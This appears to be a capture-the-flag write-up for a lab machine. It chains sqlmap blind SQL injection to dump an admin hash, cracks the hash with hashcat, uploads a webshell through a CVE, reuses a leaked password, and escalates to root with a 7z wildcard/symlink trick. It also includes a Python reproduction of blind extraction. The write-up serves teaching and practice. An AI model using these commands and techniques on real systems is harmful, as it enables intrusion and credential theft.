
I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information:

  – Backend: MySQL > 5.0.12
  – blind injectable
  – 8 columns

Which is not that much, but it's a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (these take a while to run, since every byte has to be pulled out through a yes/no oracle).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email --current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables 

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin
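The blind extraction that the sqlmap commands above automate, reproduced offline as an added example (this is my code, not code from the original write-up or from sqlmap). A hypothetical forgot_password() function backed by an in-memory SQLite database stands in for the Laravel endpoint; the email test@usage.htb, the table layout and the row contents are constructed assumptions, and the hardened variant beside it shows the parameterized query that closes the hole. SQLite's unicode()/substr() play the role of MySQL's ORD()/SUBSTRING().

```python
"""Added example: boolean-based blind SQL injection reproduced offline.

Not code from the original write-up. A hypothetical forgot_password()
function stands in for the Laravel /forgot-password endpoint on the box,
backed by an in-memory SQLite database with constructed sample rows. The
real target was MySQL, so ORD()/SUBSTRING() there are unicode()/substr() here.
"""
import sqlite3
from typing import Callable

# Constructed sample data (the hash is the one the write-up recovered).
SAMPLE_HASH = "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2"
ATTACKER_EMAIL = "test@usage.htb"   # assumed: the account the tester registered
ADMIN_HASH_EXPR = "(SELECT password FROM admin_users WHERE username = 'admin')"

Endpoint = Callable[[sqlite3.Connection, str], bool]


def build_db() -> sqlite3.Connection:
    """Stand-in for the usage_blog database: one registered user, one admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    conn.execute("CREATE TABLE admin_users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email) VALUES (?)", (ATTACKER_EMAIL,))
    conn.execute("INSERT INTO admin_users (username, password) VALUES ('admin', ?)",
                 (SAMPLE_HASH,))
    return conn


def forgot_password_vulnerable(conn: sqlite3.Connection, email: str) -> bool:
    """The defect: the parameter is concatenated into the query. The caller
    only learns whether a row matched (True/False) or the query failed
    (an exception, i.e. the 500 seen when submitting a single quote)."""
    query = f"SELECT id FROM users WHERE email = '{email}'"
    return conn.execute(query).fetchone() is not None


def forgot_password_fixed(conn: sqlite3.Connection, email: str) -> bool:
    """Hardened form: a bound parameter, so the input is never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE email = ?", (email,)).fetchone()
    return row is not None


def quote_probe(conn: sqlite3.Connection, endpoint: Endpoint) -> bool:
    """The write-up's first test: a lone single quote. A server error where a
    plain 'no such account' was expected is the tell for injection."""
    try:
        endpoint(conn, "'")
    except sqlite3.Error:
        return True
    return False


def make_oracle(conn: sqlite3.Connection, endpoint: Endpoint) -> Callable[[str], bool]:
    """Turn the endpoint into a one-bit oracle: True iff `condition` holds."""
    def oracle(condition: str) -> bool:
        # The known-good email makes the base query match; AND (...) decides
        # the outcome and the trailing comment swallows the closing quote.
        return endpoint(conn, f"{ATTACKER_EMAIL}' AND ({condition}) -- ")
    return oracle


def _search(probe: Callable[[int], bool], hi: int = 255) -> int:
    """Binary search for v in [0, hi] given probe(n) == (v > n)."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle: Callable[[str], bool], expr: str) -> str:
    """Recover the string value of SQL expression `expr` one character at a
    time, about eight oracle queries per character (sqlmap --technique B)."""
    length = _search(lambda n: oracle(f"length({expr}) > {n}"))
    chars = []
    for pos in range(1, length + 1):
        code = _search(lambda n: oracle(f"unicode(substr({expr}, {pos}, 1)) > {n}"))
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable endpoint injectable:", quote_probe(db, forgot_password_vulnerable))
    print("fixed endpoint injectable:     ", quote_probe(db, forgot_password_fixed))
    print("extracted:", blind_extract(make_oracle(db, forgot_password_vulnerable), ADMIN_HASH_EXPR))
```

Run directly, it prints the recovered bcrypt hash; against the parameterized endpoint the oracle never returns True and nothing comes out. The request count (roughly eight per character) is why the sqlmap runs above take a while, and why boolean-based (B) extraction is preferable to time-based (T) whenever the true/false tell is reliable.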

Taking a look at the hashcat example hashes page or using a script like hashid shows that it's a bcrypt hash (the $2y$ prefix, hashcat mode 3200).

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1, which I used to log in to the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages, which led me to CVE-2023-24249 (an arbitrary file upload in laravel-admin).

I used Burp Suite to proxy my requests and just followed the PoC; I had to activate the Follow Redirects option in the Repeater tab. Using the uploaded webshell can be a bit tricky because there's a cleanup script running which deletes the shell, so have whatever you want to run (for example a reverse-shell one-liner) ready before you upload it.

I am now logged in as dash, which gains me the user flag. The file .monitrc (monit's configuration, which stores the credentials for its web interface in clear text) sticks out. Having a look at it, I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users with a login shell on the box.

grep -E 'sh$' /etc/passwd

Another user is xander. I tried the pillaged password to log in as xander, which worked.

Executing sudo -l shows that xander is allowed to run exactly one binary as root. One function of this binary is backing up the website, and it does so by running 7z over the contents of /var/www/html with a wildcard. 7z treats any argument that starts with @ as a list file, so a file named @root.txt in that directory makes 7z read root.txt as its list of files to add; if root.txt is a symlink to /root/root.txt, 7z reports every line of the flag as a file it cannot find, leaking its contents.

  1. Create the file @root.txt in /var/www/html (touch @root.txt).
  2. Create a symlink to the flag in /var/www/html: ln -s -r /root/root.txt root.txt
  3. Execute the application via sudo. Its 7z error output now contains the root flag.
 